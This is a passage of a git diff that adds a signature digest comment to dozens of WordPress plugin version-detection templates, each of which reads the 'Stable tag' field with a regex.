b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..e6c061fda6 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220497a159cc901ed69ffa01fdc227d7d594114091b55411703a2be591570d56dcd022100c3c466560b1e7107b2a2d82ee64d0a4e6b1ec3f00cc04b4c0a8dbe0385d27291:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..761da4ae86 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cf090a629d70735d73436e8eb44430be3a02838e5d38e4961abb8a4ac289f4b9022100871ca51de661931e7c094c75fdbdcf86032032c5aefd0efb819aa1cfdfc09964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..06feb3e405 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202470cf2bd8cb82f6c1f6604b91ebe8a30f283e2b67a2f9cda92df03d0235fa52022100a560facfd93321a53f28f50ce09c7573b7e2bb12adcb6abae9a7a3000f420967:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..0a42c77bc6 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b806c4b4d24373cb5f6cbde245082216925cb83077b2c49620fe066aa1a6f80402205cb03d003817d260de21f83f55fd5da7caec279e486d3a584686686fd26da0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..8b799c3df1 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203d1bae898e6c99c5ab78ab7406e802b6f54e8165f0fab76da69f20aca2433f5f0220064c3b4d79d17944e31e597cb1bc270ce804b48596bd5729660f18e1d372c221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..7b88e6584a 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ca099a6110a7d392c23658a109c332da89d0f0a67a168fce8050a5b5b85d0e8f022100a895e6e001998c0fda8bfd7f5861adac57aa911f01d88bcc18bf20b6827187e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..41e7ad51c6 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204fa0d16fd73ff3d5dd5370829046d280b743e27b24d5e95b45b97d6658dea401022039f37c52a94ec584f81964b6e309e869664e32c04e09acbbf7f1444f9988ada1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..87a6688b3e 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dc28c168edec23f99293ee0fca3ae05d11f28c0f70e166cf99a7045e3a30e9900221009a7c444bdfd19f036e86d551b269e0f32fe5896ec901cb72aedf13a84127e55f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..7132ae0270 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009d03d6ed40f9cc2f82ed1c7909821886cc6f369b61ae438dd11644ecf9699472022100a1aa049f593f4692cfaf5d885fc1901cae188efce6de317096b68d3f59701a8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..95cb7e18c5 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ebdf1f79b458ee91bc6900456ffe364907da1715a12d044b6a47ef33fc9a99e022029d67ace11dce4873b19a6e6979c638461592528f80480590a55f8b40b9e3b20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..9654318ace 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f2bc0b8c5f5ec87cc6b1cb83928d5000a0cc03aede1ef37a4593e3193c0793f302204314198d3860ea7b3c15763e407b01172d368fc5cdbf8c9897de3ee1c058ceef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..a71dcaedf4 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa48d526097bfac73d5fae26b97b0574d72b192b6b7c3d4bb5e5329b2dc378d3022100fad2c729185284ed7c06668707eb2e7dc489274caf473c34b024a863a594c16e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..a8ef85aa8c 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022003b2aed626587e89913bb60a407658a392e68f8f85a7b06541445797e657c24f022100944607b5b67f3a415fdbae9e098ad5414d38529b2eddf7961e1e8afde050dc3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..3797fd11b6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220448f51b61cb36953bb7e010ff0db38882ac5f869cce7d63e9c6d6d50e2319d0702205225ce376310bfb3c93570f7d6e2a30c582ffd2411a505367a24b819361c5171:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..c3e3f4a9e4 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220117309b757a2f3f53327f3925726ba8a94da8d235b8ce5669544be7cbaf60e5f022100f31910767808ca4f56df2f3f8826460d1ba5e1b9916f2394da129b712c07b631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..1a193d56e3 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200c53ba50a5cb4c417a9763ec17536b0d3fb5e9238711b526f2af174be312b2ef0220571a098ccfa7322e55f509cb5b1ec32b9da86fc1218aa7e759233639d6655b3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..be73c35c62 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b6e4d738fcb147cf4f3e8bf1eb92e8705b0c21e2ac5f98757acc16e0556be707022100bf44b6b7fa4328a6f59fcea5c0fb184746117e46000a38554ec6fb387a9c8139:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..06e52fcda1 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b5aacf867e08082712e8a468adfbfcc395e08a72090705a16c81f5bd314ab6ce022100f7c30b51119f4cd6e3209ad84eb40c2396b65471d6d6dc4b14005bc82fb20f66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..7396019832 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee49835ceffe5e456cff41b2e1749e99ab7740393daa4809738ef9e4ea73d7eb02200152a5e293521ac44152294367053a847b9644e29d6b3351269a4533538da840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..8f947011b1 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dc79db1ebe127cd40be2a13a05d92f7df022433719daf584eca20e0496ca50d4022100c02c91546fa2d06e8933f8d809dc01ea142909bf384cdaa0cc82a29d55419a8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..f90c1483fe 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022069b56b9d627d1b9a8bc96f32dc98122a706575ef084fc0c0a01b1a68eeef256502200d08e8889d6faea6c3a3a8ed89dd93a784d82e0e387dac58a5ae2fb47de45521:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..c77b1e685b 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d033fdfebe5c9182af08adf62f491399a0c111a30546821f0ce57870c0e654ea02202057197369b6aadf363902fa149f6bd6b60c3bab3528d63e048b41db9b850665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..f98e2184df 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cf462618af3c024840a9a6a0ffa3b3d2882e44d812e7e666347f82da30ad79ce02207f5c5bb8499fac6373f2a8699fe5d70a555135433bad0e2f13b93f8a99277dea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..a7482b43d2 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203a57076881e998e6a9b2d6e0da95986c318c61838791c0229f37d6ab4b6890a702203862d7c021ea5a4a82fd35660d69b6fb49f66b7d444243f553f8ed390f7373ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..ac2b61bc83 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220655b7b4a7e532e5871998d8bd5fecd0490938d241ae88d37915bc1237c91fc59022100c47e2f0a3e3c61ae4eec943185085cef640272d39fd7ec8ceab79aeea6f1fd39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..71f7c13f2e 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f84ac2128cceaabcc1c605f156724375406577d68c1e2ededed57319dc2192ca022100c2e6414960ed3845782499339ffbed0e3b6865a505122af04113245d786c6eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..c759db485f 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100db5f821076ebaefe16d055aa616113fa62585fd7d8c36cb424930c410af5dd11022100a405d054973b1e54a9907facd7786e1e13a0ce39dc463dbc674be100521acee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..b63b208457 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009035d88d9cc649a6271bf48c964cddb9b7a9f3b09b64f569db57f2cba4c858990220699063451b01e4744ed62271898c351f1492753d697d724da41dfa9b9aefeef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..e73979aeba 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201eb22bb3ac1e1c9a2159f41a465e92097ab8275e7eaca5926fef623f711d02e4022100968b2641b6d8b183cc268ccaee308a17a9372aca1271254a8f80d94e6c3e16d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..ddc1fca3e4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220081cf9f531c1f22eb11d2d2297c12889131883ead45a96a0daec84526433a0120220763c3776f1d8a734ef51e4d73af08e99fa5225f23abc6145644737b4b350455b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..e2c76563d9 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aa41d52df7266867a7865af5ad291990a4f456c8b585d659efc4ea0f9c48d309022034ade6040143415c459fa247e38baa6887ad4739d3ec72f92b9a63531670dd1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..7e379cccd4 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eee10f47e0be718166abc9c9e2ad615c5ae08692c34285465b3429cccde3bd78022100d98662ce6d48009094ed86716d50bb1837d7323d3e413f5ae9f6b6be111f49e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..7573327519 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a54a8eb939ba740c4845ca5e1b89b9dd0012a8ceac7ca1b4982caf951f3bcf7022071df75671043d5fec635ea763f155f709b001ea74ab988f13f74cfd63f61b890:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..c0df48d691 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022016af61d0595d1c0d2501ce3cb9151f6547dc109a76fb8dfc98dc0f8be9419b52022100a56e888db1bccb3fd1759dcb4fbbf96c8748fb94bc58ad84955d361b1a1d5d34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..607bc477ae 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c73199281262659725a29e0c4df1f463b1e405663e4589722432697d22717b34022075888f879bba46ff17b640bb7f56faed90f0519c61ef648ac0c6352f88534946:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..0160d30735 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b66f4f7fb0895ca571f48708488e952e98f469fd2ceb61c023f67edf2caa6eeb0220409b6b6b9b376af5688f7696d97addff2d3fdbc7edd14910bcb69ec541900d0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..c7ba48f81b 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cf7bb8172ecbb2fdaa8cdbf97748568c9b3eb3fd4dc2b016ecbd7708099fb278022017a9c6160255a45ee9ede3aef3b6182768bb74343f3336a78721b57c76f88c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..1fc244c7ea 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ed83ae649501d1268830669a57233c0b2e7408c8af7adcb18bea87b03794ccb602200edd7271ac1a96aca7633a04588dcade60886168946f08489b5674f8abfd2a4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..7cef1cea94 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204446eeeb349956f6e6ef7b444a3e2333f1253868708df36628715d2fcb75cf3802206a327f9102967633e3b8979cab547c00d04fb6f081b8edcdbb89e8f7f42f1bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..facf88f1c2 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220092152c9968e6d6a1efc2bb98fd2c8c6d24e9fb16c22ffb237d019e1b3627f310220034e697e0557176f1d431bba3893a5d8bb447eb6791eeaec1b5ed1dc53efc4c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..a11a2df0a1 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d15a477e7f6dde5f753073dcfba7300fdb45e849e60de3da5ca208e44edc1d270220069a5305727fc2e23c570f7ebe76e8e5e016fc1263f97cb34a067b0e348c3f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..17b6c086ba 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204ba05b595d34a51dfea9ecb1c69ff88e4c8f65390f344ff38588cf450bf7d358022100f6f8795b0fd6b3a276ef4ed0f36a920604384e18d075c9b07ac2603c6110c1e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..4797fc3c22 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022060b4a0e83e1ac47da43804d7f005c0bfd5c23a7de5b2981915f9c53471696341022039dd08a4ef487b4a560131305ab46140d58c17cf728d6ef45933491d0a949187:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..e9528f7aeb 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb34556570ecd13f3ff5cceafe4186b1d512c424ebe2e8786ba723437e21cffa022056787c5e8c723b53d4f16f77fb97cc8c901814c6bc9e0a3760edb194c3d4ca90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..24489578ee 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009ec1daad6e1a7c9fc947ff170fd6c0d99e2e5440cbc189168de662ba0d47000b02205a1285996a57910ade94f84872f9f7cab8a04a1efa66750e142f9bdfc18e534b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..90e40a042c 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c36598c9cc75f34a3a932b20ee9295702f33efefc33831346baf8ba09013ad79022100985b0ca224badbdcf129e70a79aadf8547886c248af8314c97ca7b119a18dbcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..1426d2b26e 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206b8b3ea9994aca271150c927ec680d679e8f2d40eb63bf3055edaccd8f167ae1022078dcecf311931af631666ca36e176421f75eba3339a7e3e2f25f636dd159f026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..d737060f24 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ 